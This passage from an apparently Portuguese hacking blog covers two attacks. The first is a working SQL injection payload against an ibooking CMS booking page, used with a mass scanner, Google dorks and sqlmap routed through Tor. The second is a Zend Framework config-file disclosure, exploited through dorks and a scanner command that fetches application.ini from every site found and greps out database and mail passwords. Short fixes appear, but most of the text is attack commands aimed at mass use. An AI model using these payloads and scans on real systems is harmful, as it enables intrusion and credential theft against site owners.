'/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' Print saída: " border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVniL6cbLqdDGqR9jT2xSogV5atT0EjCScarp_hO0mZec93-dWrjxaQzDXemZtOlJYfspseUQiKoGDaYDEpb_XteoEx9hZK319XJABAsWhOXjbFHMnnBgnE593VXgqSNCOgmgId7TfJSLV/s640/Captura+de+tela+de+2015-09-15+20%253A11%253A32.png" title="Montando comando: SETANDO DORK DE PESQUISA --dork 'YOU_DORK' - USE --dork 'intext:"Desenvolvido por ibooking"' SETANDO ARQUIVO DE SAÍDA: - USE: -s 'ibooking.txt' SETANDO STRING EXPLOIT GET --exploit-get 'EXPLOIT_GET' - USE: --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' SETANDO TIPO DE VALIDAÇÃO: - USE: -t 3 3 O segundo tipo tenta válido o erro definido por: -a 'VALUE_INSIDE_THE _target " o parametro get setando no comando --exploit-get é injetado direto na url: Exemplo: --exploit-get '/index.php?id=1&file=conect.php' INJEÇÃO URL: http://www.target.br/index.php?id=1&file=conect.php SETANDO STRING DE VALIDAÇÃO: Especifique a string que será usada como validação no script: Exemplo: -a {string} Usando: -a '<title>hello world</title>' Se o valor específico é encontrado no alvo, ele é considerado vulnerável. - USE: -a 'INURLBR_VULN' COMANDO COMPLETO: php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' Print saída: " width="640" /></a></div>
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">EXPLORANDO VIA <a href="http://blog.inurl.com.br/search/label/sqlmap" target="_blank">SQLMAP</a>:</span></b><br />
<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">python sqlmap.py <b>-u</b> <b>'</b>http://ww.target.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61<b>'</b> <b>--dbs</b> <b>--random-agent</b> <b>--tor --tor-type</b>=SOCKS5 <b>-p</b> idPousada <b>--answers</b>=<b>'</b>follow=N,union-char=Y,time-sec=10,level=3,risk=2,dbms=MySQL,testing=Y,WAF/IPS/IDS=Y,check=Y<b>'</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<br />
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">EXPLORANDO <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">INURLBR</a> + SQLMAP:</span></b></div>
<div>
<i>Usando parâmetro da ferramenta inurlbr <b>--command-vul</b>, vai executar comando sqlmap quando constatar uma possível vulnerabilidade de acordo com as informações passadas.</i></div>
<div>
<br /></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> 'intext:"Desenvolvido por ibooking"' <b>-s '</b>ibooking.txt<b>'</b> <b>--exploit-get '</b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))<b>x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a</b> 'INURLBR_VULN<b>'</b> <b>--command-vul "</b><i>python sqlmap -u 'http://<b>_TARGET_</b>/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,technique=BEUS</i></span><i><span style="color: red; font-family: 'Courier New', Courier, monospace;">,testing=Y,WAF/IPS/IDS=Y,check=Y' </span><span style="color: red; font-family: Courier New, Courier, monospace;">--flush-session</span></i><b style="color: red; font-family: 'Courier New', Courier, monospace;">"</b></div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Print saída:</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5jXnrj5r3ayazo3vy4RIxnJ12T-dE7jOSdCQ4cWHJ9CLQlXzV541Ctkv-IiaFmvlA0NrEyJH-YeupRT_K6EAM2oSWEjunqcsN7hN8qSw7ZvE5eSwthWrvj30CuAZEXAuoaRtvZdaf9Ptj/s1600/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" EXPLORANDO INURLBR + SQLMAP: Usando parâmetro da ferramenta inurlbr --command-vul, vai executar comando sqlmap quando constatar uma possível vulnerabilidade de acordo com as informações passadas. php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' --command-vul "python sqlmap -u 'http://_TARGET_/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,technique=BEUS,testing=Y,WAF/IPS/IDS=Y,check=Y' --flush-session"" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5jXnrj5r3ayazo3vy4RIxnJ12T-dE7jOSdCQ4cWHJ9CLQlXzV541Ctkv-IiaFmvlA0NrEyJH-YeupRT_K6EAM2oSWEjunqcsN7hN8qSw7ZvE5eSwthWrvj30CuAZEXAuoaRtvZdaf9Ptj/s640/Captura+de+tela+de+2015-09-15+20%253A28%253A03.png" title=" EXPLORANDO INURLBR + SQLMAP: Usando parâmetro da ferramenta inurlbr --command-vul, vai executar comando sqlmap quando constatar uma possível vulnerabilidade de acordo com as informações passadas. php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN' --command-vul "python sqlmap -u 'http://_TARGET_/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=1&idPousada=61' --dbs --random-agent --tor --tor-type=SOCKS5 -p idPousada --answers='follow=N,union-char=Y,time-sec=2,level=3,risk=2,dbms=MySQL,technique=BEUS,testing=Y,WAF/IPS/IDS=Y,check=Y' --flush-session"" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<h3>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Solução ?</b></span></h3>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Use PDO.</b></span><br />
<a href="http://php.net/manual/pt_BR/book.pdo.php" target="_blank">http://php.net/manual/pt_BR/book.pdo.php</a></div>
<div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Use Prepares statement sem moderação:</span></b></div>
<div>
<a href="http://php.net/manual/pt_BR/pdo.prepare.php" target="_blank">http://php.net/manual/pt_BR/pdo.prepare.php</a><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Filtro de request seja POST ou GET:</span></b></div>
<div>
<a href="http://php.net/manual/en/filter.filters.sanitize.php" target="_blank">http://php.net/manual/en/filter.filters.sanitize.php</a></div>
<div>
<br /></div>
<div>
<i>O arquivo aparecendo ou não para o cliente, ele pode ser vulnerável do mesmo jeito.</i></div>
<div>
<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Outra falha que foi encontrada no sistema semana passada de titulo:</span></b><br />
<i>(0day) IBOOKING CMS - LOCAL FILE DISCLOSURE VULNERABILITY<br />Encontrada por: Pablo Verlly Moreira, que já foi reportada e corrigida pelo admin, mas sem nem um agradecimento por parte da equipe.</i><br />
<a href="https://ghostbin.com/paste/e99uz" target="_blank">https://ghostbin.com/paste/e99uz</a><br />
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Referencias:</b></span></div>
<div>
<a href="http://seclists.org/fulldisclosure/2015/Sep/56">http://seclists.org/fulldisclosure/2015/Sep/56</a></div>
<div>
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" target="_blank">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</a></div>
<div>
<a href="https://www.owasp.org/index.php/Automated_Audit_using_SQLMap" target="_blank">https://www.owasp.org/index.php/Automated_Audit_using_SQLMap</a></div>
<div>
<a href="https://dev.mysql.com/doc/refman/5.0/en/hexadecimal-literals.html" target="_blank">https://dev.mysql.com/doc/refman/5.0/en/hexadecimal-literals.html</a></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com5tag:blogger.com,1999:blog-5670232360751087799.post-86312082745544897492015-09-08T06:05:00.000-03:002015-09-08T06:09:25.878-03:00Explorando falha no Zend Framework Full Info Disclosure again! again!<h3 style="text-align: center;">
<span style="font-size: large;">3xpl0r4nd0 Z3nd Fr4m3w0rk Full 1nf0 D15cl05ur3</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd137aeTK4dTtG9yKzJcbnZGacuCOXVM1K-98pIgVv1nMH2y1D4JyHOsxFhDyUuvNBE-L73YODJegX-0MiphS2eA4YfxsF_9VV75gBDzBkwISc-9OxkraYb9YzrpTiCapU30l_53bVUhYe/s1600/17-02-2013_Zend-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins. Trata-se de uma falha no Framework Zend que possibilita acessar arquivos de configuração da aplicação local. Acessar informações como:" border="0" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd137aeTK4dTtG9yKzJcbnZGacuCOXVM1K-98pIgVv1nMH2y1D4JyHOsxFhDyUuvNBE-L73YODJegX-0MiphS2eA4YfxsF_9VV75gBDzBkwISc-9OxkraYb9YzrpTiCapU30l_53bVUhYe/s320/17-02-2013_Zend-logo.jpg" title="4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins. Trata-se de uma falha no Framework Zend que possibilita acessar arquivos de configuração da aplicação local. Acessar informações como:" width="320" /></a></div>
<div>
<span style="font-size: large;"><br /></span></div>
<div style="text-align: center;">
4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! 4Ga1n! </div>
<div style="text-align: center;">
<br />
<div style="text-align: left;">
Pois bem meus amigos o blog estava meio parado devido algumas coisas que tenho feito, mas arrumei um tempinho as 3 da madruga pra escrever esse humilde texto e passar algo meio velho, mas que ainda está em alta. devido a falta de atenção de muitos desenvs & admins.</div>
<div style="text-align: left;">
Trata-se de uma falha no <a href="http://blog.inurl.com.br/search/label/zend" target="_blank">Framework Zend</a> que possibilita acessar arquivos de configuração da aplicação local.<br />
Acessar informações como:<br />
<div>
<ol>
<li><span style="font-family: 'Courier New', Courier, monospace;">'mail.transport.username'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'mail.transport.password'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'</span><span style="font-family: 'Courier New', Courier, monospace; white-space: pre-wrap;">db.adapter</span><span style="font-family: 'Courier New', Courier, monospace;">'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.host'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.username'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.password'</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">'db.params.dbname'</span></li>
</ol>
</div>
</div>
<div style="text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exemplo:</b></span><br />
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.mail.transport.host =<b>"smtp.target.com.br"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.mail.transport.auth = <b>"loginre"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sources.mail.transport.username = <b>"wangxydlutre"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sources.mail.transport.password = <b>"12333"</b></span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.adapter = <b>"PDO_MYSQL"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.host = <b>"mysql.target.com.br"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.username =<b> "root"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.password = <b>"123456"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">resources.db.params.dbname = <b>"db_app_teste"</b></span></div>
<br />
Tais informações são encontradas no arquivo<b><span style="font-family: Courier New, Courier, monospace;"> <i>application</i>.ini,</span></b><span style="font-family: Courier New, Courier, monospace;"><b><i>db</i>.ini,<i>config</i>.ini </b></span>dentro da pasta<span style="font-family: Courier New, Courier, monospace;"><b> /application/configs.</b></span></div>
<div style="text-align: left;">
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div style="text-align: left;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Exemplo de estrutura URL:</b></span><br />
<ul>
<li>http://{taget}/pasta<b style="font-family: 'Courier New', Courier, monospace;">/application/configs/</b><b><span style="font-family: Courier New, Courier, monospace;"><i>{arquivo}</i>.ini</span></b></li>
<li>http://<b style="font-family: 'Courier New', Courier, monospace;"><span style="font-family: 'Times New Roman'; font-weight: normal;">{taget}</span>/application/configs/<i>{arquivo}</i></b><b><span style="font-family: Courier New, Courier, monospace;">.ini</span></b></li>
</ul>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Acessando arquivo via CURL:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYGruzoBZwNGaZoUNLhc4oSzCiqOZv4e9cpReLXcb9frTOfnr4r8K48Efv9VsmprtaclwMXKVyUo4GkkgoUvNMIjC7CIu3UdySVPHabt_nu3aE5nHYUhi9Xh8Gtgx179JGkIwldpxxTx7E/s1600/Captura+de+tela+de+2015-09-08+04%253A06%253A12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Acessando arquivo via CURL: curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYGruzoBZwNGaZoUNLhc4oSzCiqOZv4e9cpReLXcb9frTOfnr4r8K48Efv9VsmprtaclwMXKVyUo4GkkgoUvNMIjC7CIu3UdySVPHabt_nu3aE5nHYUhi9Xh8Gtgx179JGkIwldpxxTx7E/s640/Captura+de+tela+de+2015-09-08+04%253A06%253A12.png" title="Acessando arquivo via CURL: curl 'http://{target}/application/configs/application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)'" width="640" /></a></div>
<div>
<br /></div>
<div>
Com o conceito de como acessar tal arquivo e do que podemos encontrar no mesmo, vamos para buscar servidores.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>DORK[s]:</b></span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">site:br index of "/application/configs/"</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:/application/configs/application.ini</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">site:com ext:ini inurl:/application/ -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">-site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:/configs/ "params.password" db.ini ext:ini</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">-github.com -mozilla.org -.google.com inurl:/application/ ext:ini password</span></li>
</ul>
</div>
<div>
<br /></div>
<div>
Agora vamos explora em massa com SCANNER <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">inurlbr</a></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Download da ferramenta:</span></b><br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR">https://github.com/googleinurl/SCANNER-INURLBR</a></div>
<div>
<br />
Montar comando baseado nas informações que já sabemos, o principal intuito achar possíveis servidores através de motores de busca e já testar o possível conteúdo de cada url encontrada.<br />
O script INURLBR já possui por padrão um conjunto de strings para tal validação:<br />
<div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">/* [*]ZEND FRAMEWORK</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* Zend-Framework Full Info Disclosure</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* The username and password of the database may be obtained trough </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* the "application.ini" file</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">* <a href="https://www.exploit-db.com/exploits/29921/" target="_blank">https://www.exploit-db.com/exploits/29921/</a> */</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';</span></div>
<br />
<span style="font-size: large;"><b>COMMAND</b></span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">--dork '{YOU_DORK}'</span><i>ou</i><br />
<span style="font-family: Courier New, Courier, monospace;">--dork-file 'arquivo_dorks.txt'</span><br />
Use:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork '</b>site:br index of "/application/configs/"<b>'</b></span><i>ou</i><br />
<b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork-file '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">zend-dorks.txt</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">'</b></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET ARQUIVO DE SAÍDA:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">-s '{FILE}'</span><br />
Use:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s '</b>zend.txt<b>'</b></span></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET ID DOS MOTORES DE BUSCA:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">-q '{ID}'</span><br />
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-q</b> 1,6,7,14,22</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILTRO DE URLS:</b></span>Só é incluída no loop de testes urls que contenham a string setada em tal parâmetro.<br />
<span style="font-family: Courier New, Courier, monospace;">--ifurl '{STRING_VALIDATION}'</span></div>
<div>
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--ifurl '</b>configs<b>'</b></span></div>
<div>
<br /></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET REPLACE - MANIPULAÇÃO DE URL:</span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">--replace 'OLD_STRIN[INURL]NEW_STRING'</span></div>
<div>
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--replace '</b><i>/configs</i>[INURL]<i>/configs/application.ini#</i><b>'</b></span></div>
<div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Manipulação de URL exemplo:</span></b><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">URL original vinda do motor de busca ou arquivo:</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.target.com.br<b>/pasta/application<i>/configs</i>/languages/de/</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">URL modificada pelo replace:</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://www.target.com.br<b>/pasta/application<i>/configs/application.ini#</i>/languages/de/</b></span><br />
<br />
A function substituiu a string<b> <span style="color: red; font-family: Courier New, Courier, monospace;">/configs</span> </b>por <b><span style="color: red; font-family: Courier New, Courier, monospace;">/configs/application.ini#</span></b> e tudo depois do <b><span style="color: red; font-family: Courier New, Courier, monospace;">"#"</span></b> é ignorado. <br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET COMANDO PERSONALIZADO: </b></span></div>
<div>
Só vai executar tal comando se o script achar algo que seja considerado vulnerável.</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">--commnad-vul '{COMMAND_LINE}'</span></div>
<div>
Use:</div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--command-vul "</b>curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'<b>"</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><i>OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado</i></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>COMANDO COMPLETO:</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;">php inurlbr.php</span> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">site:br index of "/application/configs/"</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">' </b><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s '</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">zend.txt</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">' </b><b style="color: red; font-family: 'Courier New', Courier, monospace;">-q</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 1,6,7,14,22 </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--replace '</b><i style="color: red; font-family: 'Courier New', Courier, monospace;">/configs</i><span style="color: red; font-family: 'Courier New', Courier, monospace;">[INURL]</span><i style="color: red; font-family: 'Courier New', Courier, monospace;">/configs/application.ini#</i><b style="color: red; font-family: 'Courier New', Courier, monospace;">' </b><b style="color: red; font-family: 'Courier New', Courier, monospace;">--command-vul "</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">"</b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PRINT OUTPUT:</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnQAFbgOxxqKPqybfq9cMniLSl_EvMQmw0lFt4DoNpu4nOyk73AVyTYNkP5tY3T3Yk6ikykDaxha6OxkLmxi4vOFr-LXn7MolGvQEWsC7zYVSLfma74j_wHm-2SL7BcD8qIGI-30glCM4d/s1600/Captura+de+tela+de+2015-09-08+05%253A38%253A13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado COMANDO COMPLETO: php inurlbr.php --dork 'site:br index of "/application/configs/"' -s 'zend.txt' -q 1,6,7,14,22 --replace '/configs[INURL]/configs/application.ini#' --command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnQAFbgOxxqKPqybfq9cMniLSl_EvMQmw0lFt4DoNpu4nOyk73AVyTYNkP5tY3T3Yk6ikykDaxha6OxkLmxi4vOFr-LXn7MolGvQEWsC7zYVSLfma74j_wHm-2SL7BcD8qIGI-30glCM4d/s640/Captura+de+tela+de+2015-09-08+05%253A38%253A13.png" title="OBS esse comando(command) é somente para mostrar as linhas de senha do arquivo explorado COMANDO COMPLETO: php inurlbr.php --dork 'site:br index of "/application/configs/"' -s 'zend.txt' -q 1,6,7,14,22 --replace '/configs[INURL]/configs/application.ini#' --command-vul "curl '_TARGETFULL_application.ini' --user-agent 'INURLBR/5.0 (X11; Linux x86_64)' | grep 'host\|username\|password\|dbname'"" width="640" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>SOLUÇÕES ????<br />.htaccess personalizado.<br />Permissões adequadas nas pastas afetadas.</b></span><br />
<ol><span style="font-family: Courier New, Courier, monospace;"><b>
<li><b><a href="http://thiagosantos.com/blog/186/webservers/alterando-o-arquivo-index-com-htaccess/" target="_blank">http://thiagosantos.com/blog/186/webservers/alterando-o-arquivo-index-com-htaccess/</a></b></li>
<li><a href="http://www.devin.com.br/apache-autoindex/"><b>http://www.devin.com.br/apache-autoindex/</b></a></li>
<li><b><a href="http://wiki.locaweb.com/pt-br/Alterando_a_permiss%C3%A3o_de_pastas_em_Linux" target="_blank">http://wiki.locaweb.com/pt-br/Alterando_a_permiss%C3%A3o_de_pastas_em_Linux</a></b></li>
